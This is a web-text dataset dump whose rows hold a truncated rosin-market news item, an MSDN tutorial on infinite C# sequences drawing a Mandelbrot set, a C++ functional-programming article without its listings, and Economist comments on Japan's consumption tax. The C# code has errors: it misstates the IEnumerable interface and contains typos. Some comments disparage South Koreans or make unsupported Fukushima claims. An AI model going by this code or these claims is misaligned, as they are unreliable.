text
stringlengths 20
1.01M
| url
stringlengths 14
1.25k
| dump
stringlengths 9
15
⌀ | lang
stringclasses 4
values | source
stringclasses 4
values |
---|---|---|---|---|
26 August 2010 18:44 [Source: ICIS news]
?xml:namespace>
“Global rosin production dropped to 1.13m short tons last year after it reached a record high production of 1.48m tons in 2007,” said Donald Stauffer, president of Pennsylvania, US-based consulting firm International Development Associates (IDA).
IDA’s newly released 2010 Study of International Rosin Markets reported a 33% decline in Chinese rosin production from 826,000 tons in 2007 to 553,000 tons in 2009.
“Although gum rosin is expected to increase by 10-20% this year, long-term Chinese production is expected to decline because of industrialisation of lands formerly occupied by pine woods and increasing shortage of available labour,” said Stauffer.
Rosin is a natural form of resin that is obtained from pine and other coniferous plants. According to IDA, gum rosin accounted for 67% of the global total rosin production.
Tall oil rosin (TOR) accounted for 32% while wood rosin was only 1%. The
Stauffer said TOR supply was also tightening as availability of crude tall oil, the supply source for TOR, has been on the decline because of the closure of pulp mills in the US and Europe.
“At the same time, consumption of rosin and its derivatives, especially for adhesives and printing ink, continues its growth at 2-4%/year. There are currently no visible new sources for rosin production other than in
Hydrocarbon resins would have to supply the market gap, he | http://www.icis.com/Articles/2010/08/26/9388639/low-china-output-tightens-global-rosin-supply---consultant.html | CC-MAIN-2013-48 | en | refinedweb |
.
Figure 1. Mandelbrot Set (Click for larger image.)
Most of you probably know that .NET sequences can be represented using the IEnumerable<T> interface. It can be used for enumerating items in standard collections such as arrays, lists, dictionaries, and it can also be used in custom collections. This interface is also very often used together with the foreach statement. Let's first review the methods of this interface. (Other methods such as those inherited from IDisposable are not important for our examples):
interface IEnumerable<T> : IDisposable<T>
{
public void Reset();
public bool MoveNext();
public T Current { get; }
// ... other methods omitted ...
}
An enumeration over a data structure is done using the three members shown in the previous code example. First the Reset method is called to move the enumerator before the first element. After that the MoveNext method moves the enumerator to the next element in the sequence or returns false if there are no more elements. During the enumeration, the selected element can be accessed using the Current property.
Until version C# 2.0 you had to provide an implementation of this interface when you wanted to allow enumeration over your own collection. This introduced unnecessary complexity, so in C# 2.0 yield return was introduced. Using these keywords, implementing a custom enumerator is just as easy as iterating over all the elements in a loop. Let's look at a very simple example:
class MyList {
int[] elements;
IEnumerabl<int> GetEnumerable() {
for(int i=0; i<elements.Length; i++)
yield return elements[i];
}
}
This class shows how a method that returns an implementation of IEnumerable<T> can be used for enumerating all the elements in an array. The body of this method doesn't return an explicit implementation of the interface and instead uses yield return, which is compiled into an interface implementation by the C# compiler. Understanding what the code does is easy (it just iterates over all the elements and returns every single element from the array using yield return), but understanding how the code is used to implement the IEnumerable<T> interface would require another article. The important thing to understand is what happens when you call the method implemented using yield return as in the following example:
var en = myList.GetEnumerable();
When you perform this call, the object generated by the compiler is created, but not a single line of the code that you wrote is executed! The code starts executing after we call the MoveNext method. It steps to the first occurrence of yield return and then "leaves" the method and the control is transferred back to the caller of MoveNext. Of course it is not possible to step outside from an executing method and then "jump" back (keeping the original state of variables in the method), so the compiler has to translate the code in the method to a class, lift the variables to convert them to class members and generate code that implements a transition between each use of yield return. The C# compiler translates the code of the method to a state machine where every use of yield return represents a single state.
The most important thing that I wanted to point out in the previous section is that the entire body of the method is not executed unless the caller repeatedly calls MoveNext until it reaches the end and the method returns false. This means that if we write code that would execute forever, and include a call to yield return inside the code, it will not cause an infinite loop. Let's look at the simplest possible example:
IEnumerable<int> GetNumbers()
{
int i = 0;
while(true) yield return i++;
}
// Create an infinite sequence of integers
var nums = GetNumbers();
The GetNumbers method in the previous code returns an implementation of IEnumerable<int> that can be used for looping over all integers starting from 0. Since the int type has a limited range the value will eventually overflow and start counting up again from Int32.MinValue.
In the example shown above we call the method and create a variable called nums. This call simply returns a number when we call MoveNext—in and of itself it doesn't cause any infinite loops. However, you still have to be careful when working with this code. If you passed it as an argument to foreach it would cause an infinite loop because foreach would continue calling MoveNext until it returned false, which will never happen in the case of the sequence generated by the GetNumbers method!
Now, let's look at what will happen when we use LINQ query operators with the infinite sequence that we just declared. In the following example we use the Where extension method to filter only even numbers and the Select extension method to calculate the square of the filtered (even) numbers:
var sq = GetNumbers().Where(n => n % 2 == 0).Select(n => n * n);
We can use C# 3.0 query comprehension syntax to write semantically equivalent code:
var sq = from n in GetNumbers() where n % 2 == 0 select n * n;
Will this cause an infinite loop? No, because we're still working with lazy sequences represented using IEnumerable<int>. The call to the Where query operator returns a new sequence with a MoveNext method that, when called, iterates over the underlying sequence until it finds an even number and then stops. Similarly, a single step in the sequence returned by the Select operator just takes one element and calculates its square. The only remaining problem is that we have to be careful when printing the sequence, because we can't simply use foreach. Luckily, LINQ provides a Take query operator, which returns a sequence that will take the first X elements and then stop, so we can write the following code:
foreach(int n in sq.Take(10))
Console.WriteLine(n);
Clearly, Where and Select are not all query operators that you can use with infinite sequences, but you have to be careful: for example, Aggregate, Reverse or any join operators need to iterate over all the elements, which isn't possible when working with infinite sequences. Finally, you can implement your own iterators to perform operations that are not covered by standard LINQ query operators—for more information, you can look at the C# Developer Center article Custom Iterators from Bill Wagner.
So far we generated sequences explicitly using yield return. Sometimes it may be useful to write a reusable function that hides the call to yield return and provides a higher level of abstraction. For example, many sequences can be described in an inductive way, by giving the first element and a function that takes a value as an argument and calculates the next value in a sequence. This function can be implemented using the C# 3.0 Func<A0,T> delegate type:
IEnumerable<T> Generate<T>(T initial, Func<T, T?> next)
where T : struct {
T? val = initial;
while (val.HasValue) {
yield return val.Value;
val = next(val.Value);
}
}
The Generate function is generic, so it can generate sequences of any value type, so we can use C# nullable types. The first argument of the function is the initial value of type T. The second argument is a function that accepts a value of T as an argument and returns a T?, which means that it can return null or a valid value. The null return value is used to denote the end of a sequence and as you can see in the body, the condition in the while loop tests if the returned nullable type contains a value. This means that the Generate function can be used for generating both infinite and finite sequences.
The following code shows a few sequences that can be written in a very compact way using the Generate method:
// All positive integers: 1, 2, 3, 4, ...
var nums = Generate(0, n => n + 1);
// Powers of two: 1, 2, 4, 8, 16, 32, ...
var pow2 = Generate(1, n =>; n * 2);
// Finite sequence of powers of two that fit into an 'int' type
// When we get to a number that would overflow, we return 'null'
var intpow2 = Generate(1, n => {
if (n > Int32.MaxValue / 2)
return (int?)null;
else
return (int?)(n * 2);
});
In the final example we will use infinite sequence to draw the famous Mandelbrot set. When drawing the image shown on the screenshot above, we will need to calculate a color for every pixel separately. This operation can be implemented using sequences. This technique makes the code easy to read, because the implementation doesn't hide how the Mandelbrot set is defined mathematically. We'll get to the calculation of the color soon, but first, we need to build a palette with colors that you can see on the screenshot. To do this we first define two more utility functions for working with IEnumerable<T>:
IEnumerable<int> Range(int from, int to) {
for (int i = from; i <= to; i++) yield return i;
}
IEnumerable<T> Concat<T>(params IEnumerable<T>[] args) {
foreach (var en in args)
foreach (var el in en) yield return el;
}
The method called Range simply returns all integers in a specified range. The second function is used for a concatenation of sequences. It takes any number of sequences and iterates step by step over all the given sequences. Now let's look how the palette is generated:
Color[] Palette {
get {
return Seq.Concat(
Seq.Range(0, 127).Select(n =>
Color.FromArgb(0, n * 2, 0)),
Seq.Range(0, 127).Select(n =>
Color.FromArgb(0, 255 - n * 2, n)) ).ToArray();
}
}
As you saw on the screenshot, the palette starts with the color black, then blends to blue and finally changes to a green color. This means that we can generate it by concatenating two transitions (from black to blue and from blue to green) and this is exactly what the previous code does. It generates two ranges of integers and uses these numbers to generate colors using the Select query operator. The two ranges are then concatenated and the result is converted to an array and returned.
Now we can get back to the Mandelbrot set. As already mentioned, we will first write code that generates (in theory) infinite sequence of numbers and then use it to choose the color. The calculation of the sequence takes two arguments that specify the x and y coordinates of the point that we're processing. The sequence is calculated inductively, which means that we start with some initial value and then use the current value to calculate a new one. We already discussed this kind of sequence and showed how to use the Generate method to implement it easily.
The value in our example is represented using the PointF type. We use a zero point as the initial value. In every step we will first test if x^2 + y^2 is larger or equal to two. If yes, we have reached the end of the sequence (because the value is out of the specified range), otherwise we have to calculate the new value (using an equation for multiplication and addition of complex numbers), because we still can't tell if the value will eventually escape the range or not.
private static IEnumerable<PointF> GenerateMandel(float x, float y)
{
var init = new PointF(0.0f, 0.0f);
return Generate(init, (t) => {
float x2 = t.X * t.X, y2 = t.Y * t.Y;
if (Math.Sqrt(x2 + y2) >= 2)
return null;
else
return new PointF(x2 - y2 + t.X, 2 * t.X * t.Y + t.Y);
});
}
As mentioned earlier, we used the Generate method to build the sequence. You can see that using anonymous functions from C# 3.0 makes this code really compact—because the computation of the next value is a bit longer we use anonymous functions with a statement block as a body—this means that the code is wrapped in curly braces and uses a return statement.
Now we know how to calculate a sequence for every point and the only remaining problem is how to draw the bitmap using the sequence. We want to determine if the sequence will at some time in the future leave the specified range. If this happens then we know how many iterations it took and we can choose a color according to the iteration; however, when the sequence still stays in the specified range we don't know if it will ever leave it or not, so we could iterate forever! To avoid this we just stop calculating after 100 iterations and choose the lightest (green) color.
To count the number of iterations we would normally use the Count query operator, but we also need to limit the number of iterations to some maximum number. To do this we can write the following helper method that uses TakeWhile to read values from the sequence until the counter reaches zero and then uses Count to get the number of elements in the sequence (also note that we don't need the argument of the anonymous function, so we just use underscore as a variable name):
int CountMax<T>(this IEnumerable<T> en, int max) {
return en.TakeWhile(_ => max-- > 0).Count();
}
Using this CountMax method we can now implement the code that draws the Mandelbrot set. We first generate the palette and initialize variables that determine which part of the set is drawn. After that we also use a custom method called InitBitmap (described below) that generates a bitmap of specified size by calling a given function to get a color for every single pixel. In the anonymous function that returns the color we first calculate a point that we want to analyze and then call GenerateMandel to generate a sequence for this specific point. Then we use CountMax to calculate how much iterations did the sequence perform and finally we get a color for the performed number of iterations.
var colors = Palette;
// Initialize a location and a zoom of the set
float dx = 0.005f, dy = 0.005f;
float xmin = -2.0f, ymin = -1.3f;
// Generate bitmap using given function..
var mandel = InitBitmap(this.Width, this.Height, (x, y) => {
float xs = xmin + x * dx, ys = ymin + y * dy;
// Calculate number of iterations
int count = GenerateMandel(xs, ys).CountMax(100);
// Get a color for the calculated # of iterations
int val = (int)((count / 100.0) * 255.0);
return colors[val];
});
As already mentioned, the code uses InitBitmap method, which takes the function to calculate the color for a pixel as the third argument. We use C# 3.0 anonymous functions to implement this computation. In the body we first pre-compute the point in the Mandelbrot set coordinates. Using this point we generate the sequence of iterations and count the number (with 100 as a maximum). Finally, we just choose a color from the palette and return it as a result of the anonymous function.
The InitBitmap method is quite simple—it just iterates over all the pixels in the bitmap and calls the given function to calculate the color. (Indeed, it is more efficient to use the C# unsafe code to do this—this implementation can be found in the code that is attached for download.)
Bitmap InitBitmap(int width, int height, Func<int, int, Color> f) {
Bitmap b = new Bitmap(width, height);
for (int x = 0; x < this.Width; x++)
for (int y = 0; y < this.Height; y++)
b.SetPixel(x, y, f(x,y));
return b;
}
In this article we looked at one not widely know aspect of the IEnumerable<T> type, which is the fact that it can be used to represent infinite sequences of values. We also demonstrated that it is possible to use some of the LINQ query operators including the query comprehension syntax for working with these infinite data structures. I also demonstrated that it is possible to use C# 3.0 anonymous functions when manipulating or generating these types of sequences. Finally, we looked at one more complicated example that used the described technique and several new C# 3.0 language features to build an easier to understand implementation of a program for drawing the famous Mandelbrot set in a way that is closer to the original mathematical definition of the problem.
![CDATA[ Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use –. ]]> | http://msdn.microsoft.com/en-us/vstudio/cc307157 | CC-MAIN-2013-48 | en | refinedweb |
You can work in the functional programming paradigm in C++. And you may be surprised at how complete C++’s support for functional programming is.
Functional programming and C++. This combination will strike an equal mixture of disgust and terror in some of you. Others may be intrigued but daunted by the prospect.
Yet C++ has always been a multi-paradigm language. And while previous attempts to add practical functional programming features required significant effort, recent additions to the C++ standard, like lambdas, have improved the situation. This paper explores the out-of-box support for functional programming provided by the new standard. We’ll look at techniques typically found in introductory functional programming textbooks. This article assumes familiarity with C++, but not necessarily with basic functional programming.
The source code is available in github and is compiled using gcc 4.8 installed on Mac OSX using MacPorts.
Object-Oriented and Functional Programming Style
The heart of object-oriented programming is the encapsulation of data and methods in a coherent class or object. Each class or object represents an entity in the real world. Each object is responsible for the management of its state and as long as it fulfills the contract implied by its interface the implementation is of no concern to the caller. Objects interact by sending each other messages through method calls that change the internal state of the receiving object. Classes can be combined through inheritance or composition to form more complex entities.
The for-loop is a typical construct used in C++ classes. The for-loop processes elements in a container. These elements can be object instances or pointers to object instances. Usually the for-loop uses iterators to point to the next element to process in its body. The body of the for-loop typically has statements that affect the state of the element referenced by the iterator. When the for-loop reaches the end of the container all elements have been processed and some or all of them have been modified in some way. Any reference to the list acquired before the for-loop was executed will now reference the changed list. The same thing goes for references to elements in the list. So the execution of the for-loop may cause side-effects in other parts of the program, either by design or by accident. The type of programming that emphasizes the use of mutable data and statements is called an imperative programming style. It is hard to prove by simple statement inspection alone if an imperative program is correct, because its state may be affected by changes away from the statement being reviewed.
In contrast, functional programming stresses the construction of computations or functions acting on immutable values. Data and operations on the data are not co-mingled. Immutable data acts like a value like 1. You can hold a reference to 1, but 1 itself is immutable. You can add 2 to the reference but the reference itself still points to 1. This referential transparency through the use of pure functions and immutable data lies at the heart of functional programming.
Functions are first-class objects in a functional language. You can reference a function like you would any other data. Functions can have functions as arguments or return functions. Functions that take functions as arguments or that return functions are called higher order functions. You can use higher order functions to combine simpler functions into more complex ones. They play an important role in functional programming. for-loops are replaced by recursion for list processing.
Because functions play such an important role we need a formal way to represent them. This article uses Haskell’s notation for function signatures. A binary function f with arguments of type a and b and a return value of type c is represented:
The representation of function implementations uses a slightly different notation: the return type follows the double colon :: after the argument list. Here’s the type signature of the identity function:
Here are two implementations of id:
In a function definition a -> b, the arrow -> can be looked at as a type that takes two other types a and b to be fully defined. Types that are parameterized by other types, like the arrow operator -> are referred to as type constructors. In general, M a represents a type constructor M that takes a single type variable a, and M a corresponds to the C++ class template template < typename a > struct M..... The arrow operator corresponds to the function wrapper std :: function < a(b) >. Another frequently used type constructor is [ a ], which creates a list of elements of type a. [a] corresponds to the stl containers std :: list < a > or std :: forward_list < a >.
Lambda Expressions and Closures
Lambda expressions allow you to create functions on the fly. The expression in the body of the lambda can reference variables that are not specified in the argument list of the lambda expression. Those variables are called free variables. Free variables are assigned the value found in the environment (i.e., the scope) in which the lambda expression is defined. This capture of the enclosing environment by the lambda expression is called a closure.
The (slightly abbreviated) C++ syntax for the lambda expression is:
The capture specifier [...] specifies how the free variables are captured. If it’s empty [], the body of the lambda can’t reference any variables outside its scope. The [=] specifier captures free variables by value, whereas the [&] captures them by reference. The ( params ) is the parameter list and -> rettype is an optional return type specifier. Lambdas can be bound to variables using std :: function or auto.
Listing 1: various ways lambdas capture the environment
Listing 1 illustrates the use of the capture specifier. The lambda func has no arguments and prints the value of the two free variables x and y to stdout. x and y are initialized to 0 and 42 respectively, preceding the lambda definition. The capture specifier of func is [x,&y] so x is captured by value and y by reference. The next three lambdas increment the free variables x and y. The lambda inc captures y by reference. inc alt, on the other hand, captures y by value. The keyword mutable allows the lambda expression to change y. inc alt alt captures the complete environment by reference, and increments both x and y. Then func is called each time y is changed. The values of x and y printed by func are shown in the comment. Since y is captured by reference is can be changed through side effects. On the other hand x is captured once and remains the same.
Listing 2: implementation of factorial using lambda recursion
Listing 2 shows a recursive implementation of the factorial function n!. Each invocation of the lambda prints the value of the argument x. The return type is specified using the optional return specifier. Notice that the lambda itself needs to be captured by reference.
Partial Function Application
A partially applied function is created when a function is called with fewer arguments than its argument list requires. In that case, a lambda is returned with the remainder of the arguments. In C++ partial function application is supported by std :: bind and std :: placeholders :: ... Both are defined in the header < functional >. The placeholders are in the namespace std :: placeholders and are named _1, _2, etc.
std :: bind takes a callable object or a function pointer as its first argument. Subsequent arguments are either values, or placeholders provided by std :: placeholders. std :: bind returns a function object. The relative position of the values and placeholders corresponds to the position of the argument in the argument list of the function f to which they’re bound. A placeholder corresponds to an argument of the callable returned by std :: bind. The number of arguments is equal to the number of distinct placeholders.
Listing 3: std :: bind example
Listing 3 illustrates the use of std :: bind and std :: placeholders. It’s used to create a function that calls another function repeatedly with the result of the previous function call. Lambda repeat is a higher-order function that repeatedly calls its third argument. This function is initially called with the value of the second argument. The number of repetitions is given by the first argument. std :: bind is used to create a function that uses the number of repetitions as the initial value. The callable object rpl returned by std :: bind uses the number of repeats as the initial value because the first and second argument of repeat are bound to the same placeholder. rpl(l1, 9) calls lambda l1 nine times, with 9 as the initial value. The result is printed to stdout, and its value is shown in the comment.
Currying
Currying (named after the mathematician Haskell B. Curry) is a technique that turns any function into a function of one variable. Currying is related to but is more powerful than partial function application. The curried version of a function is a higher-order function that returns a partially applied version of the original function.
The function signature of a function designed to curry binary functions f(x,y) is:
curry2 takes a binary function and returns a unary function. This unary function returns another unary function when it is called with an argument of type a. This function is a partially applied version of the uncurried function f, where the argument a is provided. When you call this function with an argument of type b you obtain the value returned by uncurried function f. Here’s an example where plus is being curried:
(curry2 plus) is the curried version of plus. The return types have been shown explicitly to highlight the fact that functions are returned. curry2 plus)(5) returns a lambda that represents the plus function partially applied to 5. This is then called with 6 as the argument with an unsurprising 11 as the result. A simple implementation of curry2 to curry binary functions in C++ is shown in listing 4:
Listing 4: curry for binary operators
Currying and partial function application simplify the design of higher order functions since we only have to consider unary functions. In fact currying plays an important role in functional programming.
Neither the C++ language nor its standard library provide facilities to curry functions. In fact, in C++ functions are not written in curried form. Compare this to Haskell where functions are curried by default. The programmer needs to either use a third-party library or roll her own implementation. Writing a curry operator has become a lot easier now that lambdas are supported.
Map, zipWith, and Zip
map applies a function f of type a -> b to each element of a list [a] and returns a new list [b].
The std :: for_each function appears to fill the the bill. It takes two iterators and a unary callable object as input. The callable is called with every element in the range delimited by the iterators, and its final state is returned. std :: for_each is clearly an imperative implementation of a for-loop.
A better choice is the std :: transform function. This function has two forms. The first one takes a unary callable object as input and applies it to the elements of one range and returns another.
In the second it takes a binary callable function, applies it to two input ranges, and returns the resulting range:
Listing 5 shows a possible implementation of the map function for a std :: forward_list.
Listing 5: map for std :: forward_list
Notice that map has two type parameters. The first specifies the type of the element in the input container L. The second type parameter specifies every generic callable. std :: function could have been used to provide a more type-safe interface. However, that would not allow us to use inline lambda functions. The type of each lambda is unique and therefore would not be converted to std :: function. The type of element in the result list is determined using decltype on the return type of the callable f.
Listing 6: using std :: bind to combine functions
In listing 6 std :: bind combines two functions and the result is then mapped over the list. The inner bind takes the curried plus function cplus as the first argument and puts a placeholder as the second argument. The lambda returned by the inner bind is then used as an input to the outer lambda. The first argument of the outer bind is a lambda that has a function as input. In the body of the lambda this function is called with 2. The placeholder is bound to the first argument of cplus and 2 is used as the value for the second argument. So in effect the function f(x) = 4*x+2 is mapped over the list. The result is printed to std :: cout. 94 the result of 4*23+2, 182 the result of 4*45+2, etc. This shows how function combination can be used to limit the number of iterations and list copies.
The second flavor of std :: transform applies a function to the elements of two lists to produce a third. This corresponds to zipWith:
The first argument of zipWith is a curried function, with input parameters of type a and b respectively and return type c. This function is applied to a list of elements of type a and b respectively. The result is a list of type c. A closely related and widely used function is zip, which takes two lists and returns a list of pairs.
This listing shows the implementation of zipWith and zip for a std :: forward_list using std :: transform. The type of the return list is derived by calling decltype on the function f, which is called with an instance of A and B.
Listing 7: zipping two lists
Listing 7 illustrates the use of zip on two lists.
Listing 8: curried version of zipWith
Listing 8 is closer to zipWith’s curried version shown in the function signature above. The listing shows the same zip operation as the previous one. However, the call to zipWith requires a complete specification of the template types. This increases the line noise somewhat. C++’s type system is not powerful enough to infer the types from type of the arguments to op.
Reduce and the List Monad
The type signature for reduce is:
reduce moves or folds a binary operation over a list and returns a result. The type of the first argument to the binary operation is the same as the type returned by reduce. It’s also the type of the first input variable encountered after operator specification. The first input variable is used to initialize the first argument to the binary operation, when the first element of the list [b] is being processed.
In fact map can be implemented in terms of reduce. In that case, the type a would be the list type, and the initial value would be the empty list. The binary operator would then concatenate the result of a unary operation onto the list. Because map can be implemented using reduce, reduce is more powerful than map.
The stl function that closely matches the type signature for reduce is the std :: accumulate function found in the < numeric > header.
The version we use second takes a binary operator and a couple of list iterators as input.
The function signature of std :: accumulate tracks that of reduce fairly closely. The main difference is the order of the arguments and the lack of curry.
Listing 9: example of std :: accumulate
Listing 9 shows how we can use std :: accumulate to the maximum value in a list. std :: numericlimits < int > :: min returns the smallest possible integer value and is used to initialize the search. The binary operation is just a lambda wrapped around the compare operator and std :: accumulate returns the expected result.
Listing 10: processing a list using reduce
In listing 10 std :: accumulate is used to process a list by applying a function to each element. Notice that the body of the lambda m does in fact two things: The actual operation we would want to perform (2*y+1 in this case) as well as the concatenation of the result of this operation to the target list.
Listing 11: unary operation and reduce
Listing 11 refactors the code in listing 10 by separating the unary operation and the list concatenation. The generalized function signature of the unary operator (the lambda bound to op) is a -> [b]. At first blush this looks like a clunky re-implemention of the map function but in fact it’s more powerful.
Listing 12: the list monad
Listing 12 shows the implementation of a function called mapM based on the refactoring done in listing 11. Its signature resembles that of map. Just like map, mapM takes a unary function f and a list and returns a list:
However, note that f returns a list of elements, rather than a single value. This makes mapM a lot more powerful.
Listing 13: comparing mapM and map
Listing 13 uses mapM to redo the previous example shown in listing 7.
The main difference is that the function op that is mapped over the list returns a list rather than a single element, like it did in listing 7. In fact we could extend this example by having op return more than one element, or no elements at all. Regardless, mapM would return a list of results.
If you try to do the same thing with map, a list of lists is returned.
In a typical scenario you’d want to apply a number of operations to a list. mapM allows each function to have the same signature. It takes a single element and returns a list of elements. The next application on a list returned by map would (as you can see when the results are printed in the example) require an iteration over the result list. In fact, the resulting list is fundamentally different from the input list. It’s the ability of mapM to join the result lists of the operation into a single list that provides a great deal of power.
In fact the type signature of mapM is that of the monad implementation for lists. The use of monads and other types provide a powerful extension of the functional approach. I hope to discuss the support for those in a follow-up article.
Conclusions
Is functional programming possible for the mainstream programmer in C++? In this article I’ve discussed basic functional techniques, like lambda expressions and closures, partial function application, currying, map, and reduce. In addition, I’ve introduced a more powerful, monadic form of the map function. I’ve shown that the new additions, notably lambdas and closures, to the standard have made the use of these functional techniques a possibility. Sometimes using functional features introduces a lot of line noise in the form of accolades, returns, or semi-colons. But C++ has never been quiet in that respect, and the standard has added features, like the auto declaration and range-based for loops, that reduce this noise somewhat. The use of currying in particular may introduce some added noise in that regard. Error messages generated by the compiler are another concern. I have not shown the reader the reams of messages produced when something goes wrong. Again, this is not something entirely new to C++, but it can be a daunting task to work through.
Functional programming emphasizes referential transparency through the use of immutable data. Changes are made to a copy of that data item. In the implementations of map and reduce shown here, new lists are created containing the changed data elements. To remain referentially transparent this requires that the copy semantics of the objects is relatively straightforward. That, in turn, requires the use of straightforward data types, which behave like values, and don’t maintain state. The creation of a completely new list of data items introduces an obvious performance penalty. In languages designed for functional programming the cost of this approach is reduced because items are in fact reused. In C++ the tradeoff of referential transparency versus performance is a real one.
The extension of the functional approach to a richer class of problems, like IO, has introduced a whole new set of concepts. The extent to which those concepts are supported in C++ is a topic I’d like to address in another article.
Alfons started developing software in earnest when he was working on his PhD in physics. He transitioned into the IT side of the finance industry where he has been working on trading systems in C++, python, and Perl. A few years ago he developed an interest in functional programming, learned lisp, and authored lisp libraries for mongodb and twitter, which can be found on his github page. When he’s not programming he’s trying to improve his ironman performance, to little or no avail.
Send the author your feedback or discuss the article in the magazine forum. | http://pragprog.com/magazines/2013-07/living-with-lambdas | CC-MAIN-2013-48 | en | refinedweb |
Japan’s consumption tax Taxonomics A crucial rise in a controversial levy may be in doubt See article
Readers' comments
Reader comments are listed below. Comments are currently closed and new comments are no longer being accepted.
Sort:
Considering the amount of practical chaos brought to the retail scene after each and every VAT rise, Japan should do the reverse of what Economist recommends:
Postponed the tax rise to October 2014, but raise them to 10% in one go. That will actually SIMPLIFY the tax rate calculation, and makes retailers harder to fudge their prices to avoid accurately reflecting the rise, since every consumer can figure out the new price in their head (This is Japan, so mathematical standards are second only to India).
Japan must first consider/execute the following: In September 2011 during the height of the European Financial Crisis, Switzerland found its currency strength sufficiently problematic that it became important for its businesses/economic health that it draw a line in the sand and state unequivocally to markets that it will not permit 1 Swiss franc to be worth more than 0.83 pounds, which was approximately equivalent to SFr 1.20 to the Euro. The Swiss National Bank (SNB) added further that it would enforce a "substantial and sustained weakening of the Swiss franc" and would move to an even lower exchange rate against the euro should such action become needed. This took place in a context where during the previous month, the SNB sought unsuccessfully to weaken its currency by pledging to keep interest rates toward zero and increase the supply of Swiss francs to traders. In short, the SNB’s September intervention produced the desired effect, and major industrialized nations acquiesced because they understood that the Swiss economy and in particular exporters, the tourism industry, and those propounding contracts/forging deals could bear only so much currency volatility/strength in the Swiss franc (n.b., currency hedging via derivatives, hesitancy to finalize transactions, and reworking of numbers due to too large a range of exchange rate volatility are costs that place a burden on an economy and slow economic activity).
In a far worse circumstance than the Swiss were during the European Financial Crisis is Japan, which has been in a multi-decade battle with deflation and economic stagnation. In an effort to conquer these challenges, Japan has recently embarked on the most promising approach to extrication that it has implemented since its apex. With two of Prime Minister Abe’s three reform arrows implemented, Japan finds itself at a juncture where it is essential that it make a move analogous to the SNB. More specifically, Abe and Bank of Japan Governor Kuroda need to draw a line in the sand and state unequivocally to markets that for the next 5 years, Japan will not permit the Yen to strengthen more than 100 Yen to the US Dollar; and that if the success of Abenomics requires it, they will enforce a still weaker yen.
Such a stand will produce the following benefits: First, most Japanese firms, which are conservative as a matter of culture, have based their earnings estimates on the assumption that dollar/yen will trade between 91 and 95. Creating certainty for them that dollar/yen will not be weaker than 100 will permit these firms to raise their earnings estimates and plan domestic infrastructure/investment projects (n.b., a higher percentage of which as a consequence of dependable yen weakness will yield expected values that are profitable) with certainty that the worst case scenario for their profit projections can be calculated using dollar/yen of 100. As a result of such action, we can anticipate a response directionally analogous to what we witnessed in Switzerland where post the stated action of the SNB, the Swiss Franc lost 9% of its value in 15 minutes and the Swiss stock market gained 5%. The outcome for the yen and the Nikkei 225 would be more pronounced and, due to the market’s expected rate of dollar/yen equilibrium closer to 105 and low price/earnings ratios & multiples, sustained such that the sought-after wealth effect that Central Bankers have of late been fond of referencing would both occur and further Kuroda’s aim of putting upward pressure on prices. Importantly, in cutting off the higher end of strength as outlined by current dollar/yen volatility below its expected equilibrium price, Japan would avoid the UK’s September 1992 mistake and thus limit its action to diminishing the range of volatility while simultaneously demonstrating respect for the course of long term currency flows. Finally, the prospects for the success of Abenomics would be substantially furthered by taming markets, which are currently acting in a manner that hinders progress toward Abe’s reforms realizing their full potential. Consider the value of European Central Bank Governor Draghi’s verbal intervention during the thick of the European Financial Crisis when he stated that he would do “Whatever it takes” and that “It will be enough”. Market participants who were holding European policymakers hostage via the credit-default swap market, sovereign debt yields, and equity shorts were tamed such that intuitively they came to understand the merit in the mantra “Don’t fight the Central Bank”. Since then, they have been compliant, and the efforts of European policymakers to achieve their aims have been facilitated. In like manner, Japan too needs to announce to markets that it will not permit the Yen to strengthen more than 100 Yen to the US Dollar, and will do “Whatever it takes” including enforcing a weaker exchange rate in order to convert markets from foe to friend to the success of Abe and Kuroda.
In Japan, much debate on its failure in raising consumption tax in 1997 happens but no Japanese except my opinion have said about South Koorea's success in implementing drastic reforms with its really strong energy, to my regret. Ironically the problem of history remains the greatest obstacle between the two countries's friendship. Mr. Abe and his colleagues made the obstacle greater, including the visit to the Yasukuni shrine.
The biggest obstacles seem to be two things.
1. Occupation of Takeshima by South Korea.
2. Relentless fabrication of history ... comfort women and etc.
My personal opinion is as follows;
First, concerning the Takeshima dispute, the Japanese government should file for a judiciary judgment at the International Court of Justice in Hague.
Second, the Japanee government must firmly keep both the official statements by Mr. Murayama and Mr. Kono unchangeably to the last.
For Japan, South Korea which fought against the Asian crisis altogether with 30 millions under President Kim Dae-jung may be the best example. Now, what most importantly matters is whether current Japanese still have the then strong energy of South Koreas? Even worse, Mr. Abe as a nationalistic revisionist is entirely different from Mr. Kim as liberal democratic politician. Mr. Kim drastically reformed and brought about today's strong South Korea. Does Mr. Abe basically look backwards.
South Korea is a country that goes through currency crisis every 10 years or so. I am not sure what Japan has to learn from them ...
I agree that South Koreans has strong energy ... energy to abandon their country and migrate overseas.
"currency crisis every 10 years or so"
As a matter of fact, South Korea has been in currency crisis ever since before the time of IMF bailout. Currency swaps and foreign speculation keep South Korea look normal. But she's in crisis!
Though rarely seriously debated in Japan, "Taxonomics" may be better than debt crisis, signifying that "The country will go ruine," as Kohnosuke Matsushita warned.
Fukushima radioactive leakage will make fish around Japan unedible. I warned that Fukushima radioactivity will last at least many decades. Tax-reform won't fix the radioactivity!
I think the author is generally right in that the consumption tax will have to go up. There is considerable pressure for the Japanese government to announce some decision on the consumption tax issue by the G-20 Summit in September. Additionally, the Prime Minister's study group on tax policy met for the second time yesterday, wherein the majority of 30 or so participants supported the consumption tax increase "as planned." The IMF just came out with a statement that Japan would eventually have to increase the rate to 15% past 2015 (closer to OECD rates) in order to help put its fiscal house in order.
There are some ways the government may be able to soften the impact of the consumption tax on consumers. One would be a proposal under consideration by the Health, Labor, and Welfare Ministry to raise compensation rates for healthcare expenses, which are expected to rise with the consumption tax owing to taxes on capital investment and procurement of medical supplies by medical institutions. By changing the payment system for medical services, the government can help ease the impact of the tax increase on the cost of check-ups and such.
If the consumption tax is raised now, GDP and tax revenue will drop ... and how would that be compensated?
